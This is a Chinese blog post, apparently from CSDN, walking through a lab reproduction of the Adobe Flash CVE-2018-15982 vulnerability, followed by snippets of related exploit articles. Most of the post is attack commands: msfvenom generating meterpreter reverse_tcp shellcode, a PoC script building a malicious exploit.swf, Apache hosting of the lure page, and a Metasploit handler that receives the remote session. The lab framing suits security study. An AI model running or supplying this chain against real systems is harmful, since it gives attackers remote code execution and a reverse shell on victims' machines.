漏洞payload 靶机_CVE-2018-15982漏洞复现

最新推荐文章于 2023-12-04 16:59:33 发布
最新推荐文章于 2023-12-04 16:59:33 发布
阅读量275 收藏
点赞数
文章标签: 漏洞payload 靶机
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_34979632/article/details/112896625
版权

开篇闲聊:

自从上次写完CVE-2018-4878后我就在想,有没有能简单粗暴干掉我的Win10主机的办法,找了半天,果然没找到(说不出是开心还是悲伤),但是找到了这个最接近最新版本的Flash的漏洞。

漏洞概述:

受影响的版本:

Adobe Flash Player <= 31.0.0.153

Adobe Flash Player Installer<= 31.0.0.108

不受影响的版本:

Adobe Flash Player 32.0.0.101

Adobe Flash Player Installer 31.0.0.122

作者的版本刚好是最底下的那个.....

不过我仔细看了它的起源经过:

2018年11月29日,360高级威胁应对团队在全球范围内第一时间发现一起针对俄罗斯的APT攻击行动,通过一份俄文内容的医院员工问卷文档,携带最新的Flash 0day漏洞和具有自毁功能的专属木马程序,该漏洞(CVE-2018-15982)允许攻击者恶意制作的Flash对象在受害者的计算机上执行代码,从而获取对系统命令行的访问权限。

看起来是个很时髦的漏洞,来开始吧!

复现环境:

Kail linux

Win7 + Flash 28(为啥不选最新版本呢?因为这个是做完4878剩下的环境,懒得再下新版了哈哈)

POC: https://github.com/B1eed/VulRec/tree/master/CVE-2018-15982

复现过程:

1、创建payload程序

root@wuyou:~/CVE-2018-15982# msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.190.134 LPORT=4444 -f raw > 64.bin

root@wuyou:~/CVE-2018-15982# msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.190.134 LPORT=4444 -f raw > 86.bin

2、生成文件视频文件和网页

root@wuyou:~/CVE-2018-15982# python CVE-2018-15982.py -i 86.bin -I 64.bin -o exploit.swf

3、开启Apache服务

root@wuyou:~/CVE-2018-4878# service apache2 start

root@wuyou:~/CVE-2018-4878# cp index.html /var/www/html/index.html

root@wuyou:~/CVE-2018-4878# cp exploit.swf /var/www/html/exploit.swf

4、开始监听

root@wuyou:~# msfconsole

msf > use exploit/multi/handler

msf exploit(handler) > set payload windows/meterpreter/reverse_tcp

msf exploit(handler) > set lhost 192.168.190.134

msf exploit(handler) > set lport 4444

msf exploit(handler) > exploit

5、在靶机打开网页

192.168.190.134/index.html

页面内容

这是渗透机已经成功获取到Session了!

何普
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
CVE-2021-22192:CVE-2021-22192靶场:未授权用户RCE漏洞
03-30
CVE-2021-22192 CVE-2021-22192靶场:未授权用户RCE漏洞 0x10靶场环境 0x20目录结构 CVE-2021-22192 ├── README.md ............... [此 README 说明] ├── imgs .................... [辅助 README 说明的图片] ├── gitlab .................. [Gitlab 容器的挂载目录] │ ├── Dockerfile .......... [Gitlab 的 Docker 构建文件] │ ├── config .............. [Gitlab 配置挂载目录] │ ├── data ................ [Gitlab 数据挂载目录] │ ├── logs ................ [Gitlab 日
漏洞复现:CVE-2018-15982(Adobe Flash 0day)
RongChun的博客
01-04 606
漏洞概述: 2018年11月29日,360高级威胁应对团队在全球范围内第一时间发现一起针对俄罗斯的APT攻击行动,通过一份俄文内容的医院员工问卷文档,携带最新的Flash 0day漏洞和具有自毁功能的专属木马程序,该漏洞CVE-2018-15982)允许攻击者恶意制作的Flash对象在受害者的计算机上执行代码,从而获取对系统命令行的访问权限。 受影响的版本: Adobe Flash Player...
CVE-2018-15982漏洞复现
weixin_30371875的博客
12-20 148
作者:欧根 漏洞信息:CVE-2018-15982 Adobe已发布适用于Windows,macOS,Linux和Chrome OS的Adobe Flash Player安全更新。这些更新解决一个 关键的 Adobe Flash Player的漏洞和一个 重要的 Adobe Flash Player的安装程序的漏洞。成功利用可能导致当前用户的上下文中的任意代码执行和权限...
漏洞payload 靶机_靶机渗透测试--hack the wakanda
weixin_29547309的博客
12-23 891
大家好,本文向大家介绍一个CTF挑战靶机Wakanda,下载地址在这里。该靶机难度适中,共有三个flag(flag1.txt,flag2.txt和root.txt)。渗透测试方法如下网络扫描(Nmap,netdiscover)HTTP服务遍历Php filter协议利用LFI漏洞密码base64解码SSH登陆获取第一个flag查找属于devops用户的文件Antivirus.py文件写入恶意pyt...
漏洞payload 靶机_HTB靶机SolidState
weixin_34476847的博客
12-25 259
本篇文章仅用于技术交流学习和研究的目的,严禁使用文章中的技术用于非法目的和破坏,否则造成一切后果与发表本文章的作者无关靶机是作者购买VIP使用退役靶机操作,显示IP地址为10.10.10.51本次使用https://github.com/Tib3rius/AutoRecon 进行自动化全方位扫描执行命令autorecon 10.10.10.51 -o ./solidstate-autor...
WebLogic反序列化_CVE-2017-3248
09-06
WebLogic反序列化_CVE-2017-3248 java -jar weblogic_cmd.jar -C pwd -H 192.168.1.1 -P 7001 工具使用方法: -B Runtime Blind Execute Command maybe you should select os type -C <arg> (执行命令)Execute ...
payload_dumper-win64.zip
09-14
Payload_Dumber_x64.7z,解压手机rom中bin文件,将下载好的rom解压后出现一个不可解压的bin文件,将bin文件拖拽至payload_input目录,点击payload_dumper.exe,输出文件在payload_output文件夹中。
CVE-2018-2893:Oracle WebLogic Server 远程代码执行漏洞分析预警
07-19
攻击者可以在未授权的情况下将 payload 封装在 T3 协议中,通过对 T3 协议中的 payload 进行反序列化,从而实现对存在漏洞的 WebLogic 组件进行远程攻击,执行任意代码并可获取目标系统的所有权限。漏洞危害通过该...
CVE-2018-2893:CVE-2018-2893 PoC
04-30
CVE-2018-2893 步骤1 java -jar ysoserial-cve-2018-2893.jar WHY SO SERIAL? Usage: java -jar ysoserial-[version]-all.jar [payload] '[command]' Available payload types: Payload Authors Dependencies --...
ysoserial-cve-2018-2628:绕过Oracle WebLogic CVE-2018-2628补丁的一些代码
05-18
ysoserial-cve-2018-2628 0x1. 准备工作 ...从本项目页面下载Payload Object生成、JRMPListener程序的jar包文件(ysoserial-<version>-cve-2018-2628-all.jar) 0x2. 运行JRMPListener 命令格式: java
timertask run函数未执行_学生会私房菜【20200707期】Wordpress 4.6 任意命令执行漏洞...
weixin_39604350的博客
11-24 1237
学生会私房菜学生会私房菜是通过学生会信箱收集同学们的来稿,挑选其中的优质文档,不定期进行文档推送的主题。本期文档内容为:《Wordpress 4.6 任意命令执行漏洞》作者介绍:ATao闽江学院信息安全专业学生,目前在国科学院福州基地学习安全课程,同时在学生会安全团队进行安全攻防演练,本次主要分享平时在安全中可能会用的上的一些内容。0x00简介WordPress是使用PHP语言开发的博客...
CVE-2018-15982 Adobe Flash Player 0day漏洞复现
锋刃科技的博客
01-17 1293
0x00 前言 当地时间12月5日,Adobe官方发布安全通告修复了两个漏洞,分别是Adobe Flash Player中的0day漏洞CVE-2018-15982和Adobe Flash Player installer中的高危漏洞CVE-2018-15983。   POC下载地址:https://github.com/B1eed/VulRec/blob/master/CVE-2018-1...
CVE-2018-15982 Adobe Flash 0day漏洞复现
a1b2c3是弱口令
12-15 1399
2018年11月29日,360高级威胁应对团队在全球范围内第一时间发现一起针对俄罗斯的APT攻击行动,通过一份俄文内容的医院员工问卷文档,携带最新的Flash 0day漏洞和具有自毁功能的专属木马程序,该漏洞CVE-2018-15982)允许攻击者恶意制作的Flash对象在受害者的计算机上执行代码,从而获取对系统命令行的访问权限。 漏洞复现 git clone漏洞poc git clone ...
漏洞分析|pyLoad远程代码执行漏洞复现(CVE-2023-0297)
最新发布
xuandaoren的博客
12-04 165
pyLoad 存在代码注入漏洞,攻击者可通过此漏洞在未经身份验证的情况下注入恶意代码,导致服务器被攻陷。这代表eval_js(f"{jk} f()")使用js2py的功能,此处通过request在前端页面处直接传值给jk,eval_js函数再将jk传入的值当成js代码来执行也就是说此时我们可以执行任意js代码。但是Js2Py还支持使用pyimport语句导入任何Python代码,我们可以通过导入OS模块来执行系统命令,而且js2py的pyimport的功能是默认开启的状态。因此您可以运行任意脚本代码。
漏洞复现】Adobe Flash Player安装程序的漏洞|Flash 0day(CVE-2018-15982)
VI___
01-13 440
一、CVE-2018-15982 ——任意代码执行漏洞 2018年11月29日,360高级威胁应对团队在全球范围内第一时间发现一起针对俄罗斯的APT攻击行动,通过一份俄文内容的医院员工问卷文档,携带最新的Flash 0day漏洞和具有自毁功能的专属木马程序,该漏洞CVE-2018-15982)允许攻击者恶意制作的Flash对象在受害者的计算机上执行代码,从而获取对系统命令行的访问权限。 ...
网络靶场实战-RouterOS漏洞分析(CVE-2022-45315)
蛇矛实验室
12-24 3373
这一小节,我们简单了解了MikroTik routerOS的消息传递机制,以及学习了越界访问漏洞的原理。
MetaSploit常用漏洞payload网址
一杯咖啡的渗透记忆
05-21 956
http://www.rapid7.com/db/searchhttp://www.exploit-db.com/search/http://osvdb.org/search/advsearch
成功爬取-CVE-2018-15982漏洞复现【博客园】【1】
HWP
03-14 759
代码: import requests import bs4 from bs4 import BeautifulSoup import re ss = '' headers = { 'user-agent': 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0...
漏洞实验:CVE-2018-15982-Adobe Flash Player远程代码执行漏洞
KEY0NE的个人博客
12-26 402
漏洞简介漏洞名称Adobe Flash Player远程代码执行漏洞威胁类型远程代码执行威胁等级高漏洞IDCVE-2018-15982利用场景攻击者通过网页下载、电子邮件、即时通讯等渠道向受害者发送恶意构造的Office文件诱使其打开处理,可能触发漏洞在用户系统上执行任意指令获取控制。受影响系统及应用版本Adobe Flash Player(31.0.0.153及...
cve-2018-1297环境复现
08-03
CVE-2018-1297是一个Apache Struts框架中的严重漏洞。...总结而言,要复现CVE-2018-1297漏洞需要设置实验环境、构造恶意请求、利用漏洞以及验证漏洞。这个漏洞的严重性需要及时修复和部署补丁以确保服务器的安全性。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值